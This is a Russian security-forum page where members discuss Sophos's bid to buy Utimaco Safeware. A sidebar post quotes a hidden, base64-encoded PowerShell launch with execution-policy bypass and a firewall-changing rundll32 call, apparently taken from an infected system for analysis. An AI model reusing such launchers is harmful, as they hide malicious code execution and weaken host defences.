Перейти к содержанию
AM_Bot

Sophos намерена купить за 217 млн евро компанию Utimaco Safeware

Recommended Posts

AM_Bot

Крупный производитель программного обеспечения для обеспечения ИТ-безопасности компания Sophos сегодня выступила с публичным предложением о покупке компании Utimaco Safeware, разрабатывающей программное обеспечение для защиты электронных данных. Сумма сделки может составить 217 млн евро.

читать дальше

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Достаточно крупное поглощение с учетом того, что годовой объем продаж Sophos по итогам 2007 года оценивается где-то в 200-250 миллионов USD.

Utimaco Safeware имеет достаточно широкую линейку продуктов под брендом SafeGuard, основа которой - корпоративные решения для шифрования и управления политиками безопасности. Решения класса SafeGuard Transit, например PortProtector, можно отнести к DLP-решениям. Поэтому вслед за большой тройкой Sophos также шагнул в сторону интеграции "все в одном". Можно сказать, что покупка находится в мейнстриме развития индустрии.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Олег Рагозин

Sophos уже давно находится на пути интеграции "все в одном". Так появились технологии Application Control, Device Control, NAC (с покупкой компании Endforce) и другие, в общем не имеющие отношение непосредственно к антивирусу. Компания старается двигаться дальше, расширять линейку.

Главное, что большинство этих технологий укладывается в единый продукт, Sophos старается создать интегрированную систему защиты конечных точек, вместо набора отдельного ПО, решающего разные задачи. В этом свете мы наверное не очень скоро увидим продукт, который сможет появиться в том случае, если Sophos реализует свое предложение относительно Utimaco.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×